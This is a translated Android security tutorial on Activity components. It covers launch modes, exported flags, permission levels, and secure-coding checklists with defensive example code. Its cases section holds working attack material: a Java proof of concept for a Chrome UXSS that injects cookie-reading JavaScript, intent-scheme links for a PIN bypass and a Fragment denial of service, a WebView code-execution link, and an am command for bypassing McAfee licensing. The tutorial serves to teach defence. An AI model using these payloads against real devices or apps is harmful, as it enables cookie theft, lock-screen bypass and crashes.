One of Android's four components: Activity security in detail.
Original address: http://drops.wooyun.org/tips/3936
0x00 Popular science
Every Android application is built from the basic Android components: Activity, Service, Content Provider and Broadcast Receiver. The Activity is the main body of an application: it does most of the display and interaction work, and each screen ("interface") the user sees can be understood as an Activity.
An Activity is a visual user interface shown for the user to act on. For example, an Activity can show a list of menu items for the user to choose from, or display some photos with captions. An SMS application might contain one Activity that shows the list of contacts to send to, another that composes a message to the selected contact, and others that page through earlier messages or change settings. Although together they form a coherent user interface, each Activity is kept independent of the others, and each is implemented as a subclass of the Activity base class.
An application can have a single Activity or many, as in the SMS application just mentioned. What each Activity does, and how many there are, naturally depends on the application and its design. Usually one Activity is marked as the first one the user sees when the application starts. Moving from one Activity to another is done by having the current Activity start the next one.
0x01 Knowledge Essentials
Reference: http://developer.android.com/guide/components/activities.html
Life cycle
Start-up modes
Explicit start-up
Register the component in the manifest (AndroidManifest.xml):
<activity android:name=".ExampleActivity" android:icon="@drawable/app_icon">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
Start the Activity directly by naming its class in the Intent object:
Intent intent = new Intent(this, ExampleActivity.class);
startActivity(intent);
If the intent-filter has no action configured, the Activity can only be started explicitly.
Private Activities should be started explicitly.
Implicit start-up
Intent intent = new Intent(Intent.ACTION_SEND);
intent.putExtra(Intent.EXTRA_EMAIL, recipientArray);
startActivity(intent);
Launch mode
An Activity has four launch modes:
- standard: the default. Every start creates a new instance of the Activity in the target task.
- singleTop: if an instance of the target Activity is already at the top of the target task's stack, the system reuses that instance and calls its onNewIntent() instead of creating a new one.
- singleTask: creates the Activity instance at the top of a new task's stack. If an instance already exists, the system reuses it and calls its onNewIntent() instead of creating a new one.
- singleInstance: like singleTask, but no other Activity runs in the target Activity's task; that task only ever holds this one Activity.
Set it with the android:launchMode attribute of the activity element in AndroidManifest.xml:
<activity android:name="ActB" android:launchMode="singleTask"></activity>
The launch mode controls how tasks and Activity instances are created. The default is standard: it starts a new Activity instance without creating a new task, so the starting Activity and the started Activity are in the same stack. When a new task is created, the contents of the Intent may be readable by a malicious application, so unless you have a specific need, do not set launchMode and keep the default standard. The launch mode can be overridden by Intent flags.
taskAffinity
Tasks manage Activities in the Android system. A task's name depends on the affinity of its root Activity.
By default every Activity in an app uses the app's package name as its affinity. Task assignment follows the app, so by default all of an app's Activities belong to the same task. The assignment can be changed by setting affinity in AndroidManifest.xml, but doing so carries the risk that the information in the Intent carried to the Activity can be read by other applications.
FLAG_ACTIVITY_NEW_TASK
An important Intent flag.
Setting the Intent's flags with setFlags() or addFlags() when starting the Activity can change the launch mode. FLAG_ACTIVITY_NEW_TASK creates a new task (when the started Activity is not already running in the foreground or background). FLAG_ACTIVITY_MULTIPLE_TASK can be set together with FLAG_ACTIVITY_NEW_TASK; in that case a task is always created, so the Intent should not carry sensitive data.
Task
Stack: Activities do most of the display and interaction, so from one point of view the application we see is a combination of many Activities. To keep many Activities working together without confusion, the Android platform manages Activities with a stack that follows the last-in, first-out principle: the Activity at the top of the stack is always the one shown, and it is the Activity most recently opened.
Task: a group of related Activities, managed in the same way as the Activity stack. From the user's point of view an "application" is a task, but fundamentally a task can be composed of Activities from one or more Android applications.
If the user leaves a task for a long time, the system clears the Activities below the top of the stack, so that when the task is reopened only the top Activity is restored.
Intent Selector
When several Activities handle the same action, a chooser pops up for the user to pick one when that action is invoked.
Permissions
android:exported
Whether an Activity component can be launched by an external app depends on this attribute: when it is true the Activity can be started by an external app; when it is false it can only be started by its own app (or by a process running under the same user ID, or as root).
If no intent-filter action is configured, exported defaults to false (without a filter the Activity can only be started by its explicit class name), which in effect limits it to the app itself. If an intent-filter action is configured, exported defaults to true.
The exported attribute only restricts whether the Activity is exposed to other apps; external start-up can additionally be restricted with permission declarations in the manifest.
android:protectionLevel
http://developer.android.com/intl/zh-cn/guide/topics/manifest/permission-element.html
normal: the default. Low-risk permissions; any application can use them and installation does not require user confirmation.
dangerous: permissions such as WRITE_SETTINGS and SEND_SMS are risky because they can be used to reconfigure the device or incur charges. Use this protectionLevel for permissions the user may be concerned about. Depending on the Android version and the device, Android warns the user about these permissions when the program is installed.
signature: these permissions are granted only to programs signed with the same key as the program that declares them.
signatureOrSystem: like signature, except that applications in the system image are also eligible. This lets custom Android system applications gain access too, and this protection level helps integrate the system build process.
<!-- *** POINT 1 *** Define a permission with protectionLevel="signature" -->
<permission
    android:name="org.jssec.android.permission.protectedapp.MY_PERMISSION"
    android:protectionLevel="signature" />

<application
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name" >

    <!-- *** POINT 2 *** For a component, enforce the permission with its permission attribute -->
    <activity
        android:name=".ProtectedActivity"
        android:exported="true"
        android:label="@string/app_name"
        android:permission="org.jssec.android.permission.protectedapp.MY_PERMISSION" >
        <!-- *** POINT 3 *** If the component is an activity, you must define no intent-filter -->
    </activity>
</application>
Key methods
- onCreate(Bundle savedInstanceState)
- setResult(int resultCode, Intent data)
- startActivity(Intent intent)
- startActivityForResult(Intent intent, int requestCode)
- onActivityResult(int requestCode, int resultCode, Intent data)
- getStringExtra(String name)
- addFlags(int flags)
- setFlags(int flags)
- setPackage(String packageName)
- getAction()
- setAction(String action)
- getData()
- setData(Uri data)
- getExtras()
- putExtra(String name, String value)
0x02 Activity categories
The type of Activity and how it is used determine its risk and its defence, so Activities are categorised as: private, public, partner, in-house.
Private Activity
A private Activity should not be started by other applications, which makes it relatively safe.
When creating the Activity:
1. Do not specify taskAffinity. // Tasks manage Activities; a task's name depends on the affinity of its root Activity. By default an Activity uses the package name as its affinity, and tasks are assigned per app, so an app's Activities belong to the same task by default. An Intent that starts an Activity across tasks may be read by other apps.
2. Do not specify launchMode. // The default is standard, and we recommend keeping it. When a new task is created, other apps may be able to read the Intent's contents.
3. Set the exported attribute to false.
4. Handle data received from the Intent carefully, whether or not the Intent was sent internally.
5. Sensitive information may only be handled inside the application.
When using the Activity:
6. Do not set FLAG_ACTIVITY_NEW_TASK when starting the Activity. // FLAG_ACTIVITY_NEW_TASK creates a new task (the started Activity is not placed in the caller's stack).
7. Open the app's internal Activities with explicit start-up.
8. Only pass sensitive information with putExtra() when the target is an Activity within the app.
9. Handle returned data with care, even data from the same application.
Public Activity
A publicly exposed Activity component that can be launched by any application.
When creating the Activity:
1. Set the exported attribute to true.
2. Handle the received Intent carefully.
3. Do not include sensitive information in returned data.
When using the Activity:
4. Do not send sensitive information.
5. Be cautious with received return data.
For partner and in-house Activities see http://www.jssec.org/dl/android_securecoding_en.pdf
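The private and public checklists above, worked through in code as an added example (not code from the original post or from the JSSEC guide). AccountDetailActivity, ShareTargetActivity and the extra name are assumptions; the two classes are shown together but live in separate files, and AccountDetailActivity is registered with android:exported="false" and no intent-filter.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

// file AccountDetailActivity.java: private activity (points 1-5), default
// launchMode and taskAffinity. It still validates what it receives, because
// an internally sent Intent can also be malformed (point 4).
public class AccountDetailActivity extends Activity {
    public static final String EXTRA_ACCOUNT_ID = "account_id"; // assumed extra name

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        String id = getIntent().getStringExtra(EXTRA_ACCOUNT_ID);
        if (id == null || !id.matches("[0-9]{1,12}")) { // reject anything unexpected
            finish();
            return;
        }
        // ... render the account; the sensitive data never leaves this app (point 5)
    }

    // Explicit start (points 6-8): the target class is named, so there is no
    // implicit resolution, and no FLAG_ACTIVITY_NEW_TASK, so the extra stays
    // inside the caller's own task.
    public static void open(Activity from, String accountId) {
        Intent i = new Intent(from, AccountDetailActivity.class);
        i.putExtra(EXTRA_ACCOUNT_ID, accountId);
        from.startActivity(i);
    }
}

// file ShareTargetActivity.java: public activity (exported="true"). Any app can
// start it, so the Intent is untrusted input (point 2) and the result must
// carry nothing sensitive (point 3).
public class ShareTargetActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri data = getIntent().getData();
        if (data == null || !"https".equals(data.getScheme())) { // scheme allow-list
            setResult(RESULT_CANCELED);
            finish();
            return;
        }
        Intent result = new Intent();
        result.putExtra("accepted", true); // status only, no user data
        setResult(RESULT_OK, result);
        finish();
    }
}
```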
Security recommendations
- A private Activity used only within the app should not have an intent-filter; if one is configured, set the exported attribute to false.
- Use the default taskAffinity.
- Use the default launchMode.
- Do not set FLAG_ACTIVITY_NEW_TASK in the Intent when starting the Activity.
- Handle received Intents and the information they carry with caution.
- Verify the signature of in-house apps.
- When an Activity returns data, be aware that the target Activity may leak the information.
- Use explicit start-up whenever the target Activity is known.
- Handle data returned by an Activity with care; it may have been spoofed by a malicious application.
- Verify that the target Activity is not a malicious app to avoid Intent spoofing; this can be done by checking the hash of its signing certificate.
- When an asset is passed on to another component, protect it with the same level of protection as its source.
- Send as little sensitive information as possible, bearing in mind that Intent contents used to start a public Activity could be stolen by a malicious application.
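The in-house signature check from the recommendations above (verify the caller's signing-certificate hash before returning data to it), as an added example that is not part of the original post. The class name and the SHA-256 placeholder are assumptions; getCallingPackage() only yields a value when the caller used startActivityForResult(), and an in-house app is assumed to have a single signer.

```java
import android.app.Activity;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.Signature;
import java.security.MessageDigest;

public class CallerSignatureCheck {
    // Placeholder, not a real value: SHA-256 of the in-house signing certificate.
    static final String EXPECTED_SHA256 =
            "0000000000000000000000000000000000000000000000000000000000000000";

    // True only when the activity was started for a result by a package whose
    // signing certificate(s) all match the expected hash.
    public static boolean callerIsTrusted(Activity self) {
        String caller = self.getCallingPackage(); // null unless startActivityForResult was used
        if (caller == null) return false;
        try {
            PackageInfo info = self.getPackageManager()
                    .getPackageInfo(caller, PackageManager.GET_SIGNATURES);
            if (info.signatures == null || info.signatures.length == 0) return false;
            for (Signature sig : info.signatures) {
                if (!EXPECTED_SHA256.equalsIgnoreCase(sha256Hex(sig.toByteArray()))) return false;
            }
            return true;
        } catch (Exception e) { // unknown package, or no SHA-256 provider
            return false;
        }
    }

    static String sha256Hex(byte[] data) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(data);
        StringBuilder sb = new StringBuilder();
        for (byte b : digest) sb.append(String.format("%02x", b));
        return sb.toString();
    }
}
```

Call callerIsTrusted(this) in onCreate() and finish() without a result when it returns false.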
0x04 Test methods
View Activities:
- Decompile and inspect the activity components in AndroidManifest.xml (focus on those that configure an intent-filter but do not set exported="false")
- Open the installed app directly with RE to view its configuration file
- Drozer scan: run app.activity.info -a <package name>
- Dynamic view: in logcat, set the filter tag to ActivityManager
Start an Activity:
- adb shell: am start -a <action> -n <package>/<component>
- Drozer: run app.activity.start --action android.intent.action.VIEW ...
- Write your own app that calls startActivity() or startActivityForResult()
- Remote start from the browser via the intent scheme: http://drops.wooyun.org/tips/2893
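A manifest audit for the enumeration step above (activities with an intent-filter but no exported="false"), written as an added example rather than anything from the original post. It assumes the manifest has already been decoded to plain XML, as the decompile step produces; the class name is invented.

```java
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

public class ExportedActivityAudit {
    static final String ANDROID_NS = "http://schemas.android.com/apk/res/android";

    // One finding per activity or activity-alias that other apps can start:
    // exported="true", or an <intent-filter> present without exported="false".
    public static List<String> reachableActivities(File manifest) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true); // needed so android:* attributes resolve
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // untrusted XML
        Document doc = f.newDocumentBuilder().parse(manifest);
        List<String> findings = new ArrayList<>();
        for (String tag : new String[] {"activity", "activity-alias"}) {
            NodeList nodes = doc.getElementsByTagName(tag);
            for (int n = 0; n < nodes.getLength(); n++) {
                Element e = (Element) nodes.item(n);
                String exported = e.getAttributeNS(ANDROID_NS, "exported"); // "" when absent
                boolean hasFilter = e.getElementsByTagName("intent-filter").getLength() > 0;
                // Default rule from the text: no filter -> not exported, filter -> exported.
                boolean reachable = exported.isEmpty() ? hasFilter : "true".equals(exported);
                if (!reachable) continue;
                String perm = e.getAttributeNS(ANDROID_NS, "permission");
                findings.add(String.format("%s %s exported=%s intent-filter=%b permission=%s",
                        tag, e.getAttributeNS(ANDROID_NS, "name"),
                        exported.isEmpty() ? "(default)" : exported, hasFilter,
                        perm.isEmpty() ? "(none)" : perm));
            }
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        for (String line : reachableActivities(new File(args[0]))) System.out.println(line);
    }
}
```

Entries with permission=(none) are the ones to review first, since nothing but the exported flag stands between them and any installed app.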
0x05 Cases
Case 1: bypassing local authentication
WooYun: Huawei network disk Android client local password bypass (works without root)
Bypassing McAfee's key verification and activating it for free:
$ am start -a android.intent.action.MAIN -n com.wsandroid.suite/com.mcafee.main.MfeMain
Case 2: local denial of service
WooYun: Kuaibo browser Android client local denial of service
WooYun: Snowball Android client local denial of service vulnerability
WooYun: Tencent Messenger (QQ) DoS vulnerability (critical)
WooYun: Tencent Weibo multiple DoS vulnerabilities (critical)
WooYun: Android native Settings application has a crash that can always be triggered (usable for a denial-of-service attack) (involves Fragment)
Case 3: interface hijacking
WooYun: Android interface hijacking via a floating window to phish account credentials
Case 4: UXSS
The vulnerability exists in Chrome for Android version 18.0.1025123: the class "com.google.android.apps.chrome.SimpleChromeActivity" allows a malicious app to inject JS code into any domain. Part of its AndroidManifest.xml configuration is as follows:
<activity android:name="com.google.android.apps.chrome.SimpleChromeActivity"
          android:launchMode="singleTask"
          android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
    </intent-filter>
</activity>
The class "com.google.android.apps.chrome.SimpleChromeActivity" is configured with an intent-filter, but "android:exported" is not set to "false". The malicious application first calls the class with the data set to "http://google.com", then calls it again with the data set to malicious JS such as 'javascript:alert(document.cookie)'; the malicious code then runs in the http://google.com domain. The class can be opened through the Android API or via am (ActivityManager). The PoC is as follows:
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TestActivity extends Activity {
    // Placeholder: the original post omits the sleep duration.
    private static final long DELAY_MS = 0;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent i = new Intent();
        ComponentName comp = new ComponentName("com.android.chrome",
                "com.google.android.apps.chrome.SimpleChromeActivity");
        i.setComponent(comp);
        i.setAction("android.intent.action.VIEW");
        Uri data = Uri.parse("http://google.com");
        i.setData(data);
        startActivity(i);
        try {
            Thread.sleep(DELAY_MS);
        } catch (Exception e) {
        }
        data = Uri.parse("javascript:alert(document.cookie)");
        i.setData(data);
        startActivity(i);
    }
}
Case 5: implicit start-up Intent containing sensitive data
No public case; the attack model is shown in the diagram of the original post.
Case 6: Fragment injection (PIN bypass and denial of service)
Fragments are only mentioned here; a separate article may follow.
<a href="intent:#Intent;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end">16. Bypass PIN, Android 3.0-4.3 (selector)</a>
<a href="intent:#Intent;S.:android:show_fragment=XXXX;launchFlags=0x00008000;SEL;component=com.android.settings/com.android.settings.Settings;end">17. Fragment DoS, Android 4.4 (selector)</a>
Case 7: WebView RCE
<a href="intent:#Intent;component=com.gift.android/.activity.WebViewIndexActivity;S.url=http://drops.wooyun.org/webview.html;S.title=WebView;end">15. Lvmama code execution (fixed)</a>
0x06 References
http://www.jssec.org/dl/android_securecoding_en.pdf
Android Activity Security (EXT)